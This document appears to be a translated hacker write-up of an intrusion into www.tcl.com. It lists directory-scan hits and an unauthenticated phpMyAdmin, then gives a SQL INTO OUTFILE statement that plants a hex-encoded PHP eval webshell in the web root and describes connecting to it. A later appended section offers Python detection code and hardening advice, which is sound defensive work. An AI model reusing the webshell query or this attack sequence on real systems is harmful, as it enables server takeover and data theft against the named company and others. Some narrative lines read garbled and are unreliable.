Daniel laughed. In fact, this is luck.
Target website: www.tcl.com
Website structure (server banner):
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
The scan result is as follows:
http://www.tcl.com:80/%23sql.asp HTTP/1.1 200 OK
http://www.tcl.com:80/%23sql.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/%23sql.php HTTP/1.1 200 OK
http://www.tcl.com:80/a HTTP/1.1 200 OK
http://www.tcl.com:80/cgi-bin/ HTTP/1.1 403 Forbidden
http://www.tcl.com:80/index.php HTTP/1.1 200 OK
http://www.tcl.com:80/main/ HTTP/1.1 403 Forbidden
http://www.tcl.com:80/News HTTP/1.1 200 OK
http://www.tcl.com:80/news/ HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/default.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/default.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/default.php HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/upfile.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/upfile.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/upfile.php HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin_login.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin_login.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin_login.php HTTP/1.1 200 OK
http://www.tcl.com:80/news/login.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/login.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/news/login.php HTTP/1.1 200 OK
http://www.tcl.com:80/news/manage/login.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/manage/login.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/news/manage/login.php HTTP/1.1 200 OK
http://www.tcl.com:80/news/newadmin/ HTTP/1.1 200 OK
http://www.tcl.com:80/news/newadmin/test.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/newadmin/test.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/news/newadmin/test.php HTTP/1.1 200 OK
http://www.tcl.com:80/newslogin.htm. HTTP/1.1 200 OK
http://www.tcl.com:80/phpinfo.php HTTP/1.1 200 OK
http://www.tcl.com:80/upload.php HTTP/1.1 200 OK
http://www.tcl.com:80/upload.php?action=upfile HTTP/1.1 200 OK
http://www.tcl.com:80/phpinfo.php HTTP/1.1 200 OK
http://www.tcl.com:80/news/wenzhang.mdb HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/upfile.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/ HTTP/1.1 200 OK
http://www.tcl.com:80/phpmyadmin/ HTTP/1.1 200 OK
There are many more issues, which will not be posted here.
Access http://www.tcl.com:80/newslogin.htm.
The error message directly exposes the absolute path:
Fatal error: Cannot instantiate abstract class Action in /opt/lampp/htdocs/tcl/Front/Runtime/~Runtime.php on line 2
Now let's take a look at http://www.tcl.com:80/phpmyadmin/ and try to access it.
This stupid vulnerability is real: the phpMyAdmin back end can be entered without any account or password. I really don't understand how the website protection staff of the TCL website could have this vulnerability.
After logging in to the phpMyAdmin back end: didn't we already get the absolute path?
Write a one-line webshell using SQL.
Click SQL and run:
SELECT 0x3C3F706870206576616C28245F504F53545B636D645D293F3E INTO OUTFILE '/opt/lampp/htdocs/tcl/2b.php';
Access www.tcl.com/2b.php and use the client to connect to www.tcl.com/2b.php.
A blank page indicates that the data was inserted successfully and that the client can connect.
The next thing to win is to pass the webshell, and I will not take a txt flash.
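A defender's view of the SQL step above, as an added example that is not part of the original post: a Python check over MySQL general query log lines that decodes the hex literal in a SELECT ... INTO OUTFILE/DUMPFILE statement and flags script content being written into a web root. The log lines, the web-root and extension lists, and the function names are constructed assumptions.

```python
import re

# SELECT <hex literal> INTO OUTFILE|DUMPFILE <path>; quotes may be missing in copied logs.
WRITE_RE = re.compile(
    r"select\s+0x([0-9a-f]+)\s+into\s+(outfile|dumpfile)\s*['\"]?([^'\";\s]+)", re.IGNORECASE)
# Assumption: extensions the web server would hand to an interpreter.
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")
# Assumption: document roots to watch; the stack on this page lives under /opt/lampp/htdocs.
WEB_ROOTS = ("/opt/lampp/htdocs/", "/var/www/")
# Byte sequences that open a server-side script block.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%")


def inspect_query(sql):
    """Return a finding dict for a hex-literal file write, or None if it is not one."""
    m = WRITE_RE.search(sql)
    if not m:
        return None
    hex_body, verb, path = m.group(1), m.group(2).lower(), m.group(3)
    hex_body = "0" * (len(hex_body) % 2) + hex_body  # MySQL left-pads odd-length literals
    payload = bytes.fromhex(hex_body)
    reasons = []
    if path.lower().endswith(SCRIPT_EXTS):
        reasons.append("script extension")
    if path.startswith(WEB_ROOTS):
        reasons.append("under web root")
    if any(mark in payload.lower() for mark in SCRIPT_MARKERS):
        reasons.append("script tag in decoded literal")
    return {"verb": verb, "path": path, "size": len(payload), "reasons": reasons}


def scan_log(lines):
    """Yield (line_number, finding) for every file write with at least one reason."""
    for n, line in enumerate(lines, 1):
        finding = inspect_query(line)
        if finding and finding["reasons"]:
            yield n, finding


# Constructed general-query-log lines; the first literal decodes to '<?php echo 1; ?>'.
SAMPLE_LOG = [
    "101 Query SELECT id, title FROM news WHERE id = 7",
    "101 Query SELECT 0x3C3F706870206563686F20313B203F3E INTO OUTFILE '/opt/lampp/htdocs/tcl/x.php'",
    "102 Query SELECT 0x68656C6C6F INTO DUMPFILE '/tmp/report.txt'",
]

if __name__ == "__main__":
    for n, f in scan_log(SAMPLE_LOG):
        print(n, f["verb"], f["path"], "|", ", ".join(f["reasons"]))
```

Setting MySQL's `secure_file_priv` to a directory outside the web root, or withholding the FILE privilege from the account phpMyAdmin uses, blocks the write itself; this check is for hosts where that is not yet in place.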